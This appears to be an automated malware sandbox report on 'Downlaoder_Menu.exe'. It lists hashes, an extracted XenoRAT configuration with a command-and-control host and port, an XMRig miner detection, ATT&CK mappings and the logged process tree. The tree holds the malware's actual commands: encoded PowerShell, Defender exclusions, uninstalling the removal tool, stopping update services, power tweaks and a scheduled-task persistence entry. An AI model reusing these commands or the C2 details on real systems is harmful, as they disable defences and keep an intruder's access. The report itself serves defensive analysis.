Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
02-08-2024 23:31
General
-
Target
Downlaoder_Menu.exe
-
Size
4.5MB
-
MD5
ec79983fdb605310fac832ba5809e2d6
-
SHA1
ca83d6453563e02decf614d0ce331de493267d2f
-
SHA256
b67d8fc52334fb2309368bf2a738520f1b42436951b211b7896f612b86350c10
-
SHA512
234bb8696c8a6929784165366dc4317d5826738711a7661bf26e4ffab8e958db23d0f2a11542b3f0b5c4c71d62d3e4bc7a730d94d917a21d132d40e2a67ed460
-
SSDEEP
98304:ePj50PrsilC2IbhblAh5+dWspirADIsYAVjw1gI:i5gahZWs80sfsw1R
Malware Config
Extracted
xenorat
hax.onthewifi.com
hAxxx
-
delay
5000
-
install_path
appdata
-
port
1960
-
startup_name
Windows
Signatures
-
XenorRat
XenorRat is a remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 11 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 4 TTPs
-
Drops startup file 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 16 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 5 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Downlaoder_Menu.exe"C:\Users\Admin\AppData\Local\Temp\Downlaoder_Menu.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZgBiACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGgAcwBjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBpAG4AZABvAHcAcwAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACAAZQBuAGMAbwB1AG4AdABlAHIAZQBkACAAYQBuACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGUAcgByAG8AcgAuACAAVgBlAHIAaQBmAHkAIAB0AGgAYQB0ACAAdABoAGUAIABpAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAHMAbwB1AHIAYwBlAHMAIABhAHIAZQAgAGEAYwBjAGUAcwBpAGIAbABlACwAIABhAG4AZAAgAHIAZQBzAHQAYQByAHQAIAB0AGgAZQAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHgAZABtACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAawByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZgBnACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Downloader_Menu_2.1.exe"C:\Windows\Downloader_Menu_2.1.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\cvtres.exeC:\Users\Admin\cvtres.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\temp_.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe5⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\explorer.exeexplorer.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\risk.exe"C:\Users\Admin\AppData\Roaming\risk.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe"C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "Windows" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBE00.tmp" /F4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD5658f3bf78584ea9c1f07bd757ac40458
SHA17ef82e5fe0f022e7947d4c415989d022600b85a8
SHA25638d02db2af94bc460d7cccbd261dd830744a4546a29a9ac798fb61f2297e9df8
SHA512c5068b954c15c5861c0d58b82d129d7be8da6479a9b8886295cf67eae2aec0d08f71a67783462c93ef70d09d9fc71f9e4112cb57056ae1c6b936f2c7c5205179
-
Filesize
1KB
MD5c99a3482a8a02266c151f4871d26f7b8
SHA13e29577df0aa39dd71435d64187d79889de752c6
SHA256db0b13e6d8f9513168e629a19b647b71fc836028935e4423792698e98e6879a8
SHA512fe29e5dc317da5c1efdbcef061119172b4108601db320c92a2132e0c83cfbaf604ccf9c390af82842b97f84d0bac934d80f052a84b3a7a93927b4b48152fde5a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5c824a7486b8af655d347fd367022d0d2
SHA117bb7f077818e6d5ecb3be0fc681d341b82dd72b
SHA256025ef7965c1b7643ff8d71a48c71d62ce4380e3ac6324ecf51f80717a4d61c14
SHA512a026982ac700263bf2dfd5415365dbe52b0e59095adfd00c937af28f5c84978faf65aeb2cd2c7c9dc5c7b38dc82dc2acc2d7b91e96026e73a881483168586bc1
-
Filesize
45KB
MD52cb05f0d4360327b33956fedf516c6fe
SHA14562653b1361ce66ded9633e5883d00184c08796
SHA256af82f7a1ca358d54f5da73409d05360c265f7569fb768218051c7ef2620e66e6
SHA512f0967245d1693d74d146356c9540a9ae0b848a96a6e58eacc111a951a6b32e01f325f8848b2b0c66b38dbfcdcb37e052ccfc27cf9b3b6752f3cba876181f6fa6
-
Filesize
5KB
MD5c9698a20e68954387eed40d36d17c087
SHA1c50cf0ac1cbf51a89b6c1b816e5e63e7e7287179
SHA2563a71a978827979baeec7b94607e93a72cf2a51a7204a572f68a3788d83b87d8f
SHA512f8099e4e6bf6e1cd850faa398b3ef8862852342bef0ec8a7318495be6e82ddf903834b951faa6c5bbd0879414dcaccf3fec6ade4ef74054e08011d718ed1e813
-
Filesize
5.4MB
MD596b7afe999094957a1ce5b1c0ee0cb2f
SHA16b5d48b5f75246993de0263d27d2b9cdcc6ebf3f
SHA256d22cb88bfae5285d86cb35c2acba863f85b2e63c241c1959d15ca3416bcb5e4a
SHA512ed7e02b26664b442f95fdf83af03d7773c017dadf3bec8c2d37cc2b30c49b6751a3104b85f00cfedbd145f422635e5b3ad49ea80adf7c0a92b06db474c6a238c
-
Filesize
1KB
MD55e817bbd9ef2f8821aa0283b20a51923
SHA1102ca518d89653fb400636e660fa3fc276235c5c
SHA25627f2822ca2be992ebb6e1000aa3a2c39e9b4ff7e257cb45eadda8776d65018a7
SHA512f21388e0655e6733abc70ff9fe2bbfdca00d81d2e7a09236d679293df34a966990f689f2d62119cdd877c7aeda35ab0c2b3c66108bc6b721e5dea34a93342d2e
-
Filesize
5.4MB
MD5ff46d6b0970c55dba491b6dd06384f84
SHA1c8be08575f2174a9a00bff33e3b1a7c1d9c4a025
SHA256a5ad5faab69350449e8fd14adcb262ecb289696d5f0da374891e9eb226824c85
SHA512b0d5b4eb5d9b58f35f218dffb43956716adb062626a75fcde11ba517e9d16d015f8a0d90ae72fbad47c87cbec86ef3e6a16347900f0c0be97e47f6d58bdac3a6
-
Filesize
1KB
MD55a0a8376c0e45cc25d4050920cee3dcc
SHA12de4ddf90f3165b245bd9f77c145c8f770c98b85
SHA25686af1b7845145745ccaf65bf0dbeb1a981701ad0c6793c2dc93c0c2f2aef8d25
SHA512f5afd39336d6b9f0590d68a716e8c3b403c13b98aae34d76f43e34698d2c6485e3dbce7a6439623362effec50ab0b2696b1ed25e377ba4dae75047ef419f51c0
-
Filesize
4.4MB
MD59d3195f106a540570da0d038bc07cf68
SHA133c1dd7a4101d1622b4d9268da0b731e00ddca39
SHA256240b3b43f49f5430d9d2e263e857d6e4c9c98af09fe8ae7d9c0e6b7c9eeacfce
SHA5129c7b0da3e2a01a05f61e39648d31851c5b0d70d7f20d865792cf4c8cec39ad764b2f11833116dbcdea57f3ec1785345921defbd656eab4fc23095b63ba889f69
-
Filesize
5.2MB
-
Filesize
120KB
-
Filesize
24KB
-
Filesize
136KB
-
Filesize
472KB
-
Filesize
6.5MB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
104KB
-
Filesize
5.6MB
-
Filesize
6.2MB
-
Filesize
584KB
-
Filesize
408KB
-
Filesize
4KB
-
Filesize
304KB
-
Filesize
40KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
56KB
-
Filesize
7.7MB
-
Filesize
68KB
-
Filesize
84KB
-
Filesize
600KB
-
Filesize
216KB
-
Filesize
656KB
-
Filesize
120KB
-
Filesize
208KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
32KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
72KB
-
Filesize
5.0MB
-
Filesize
5.0MB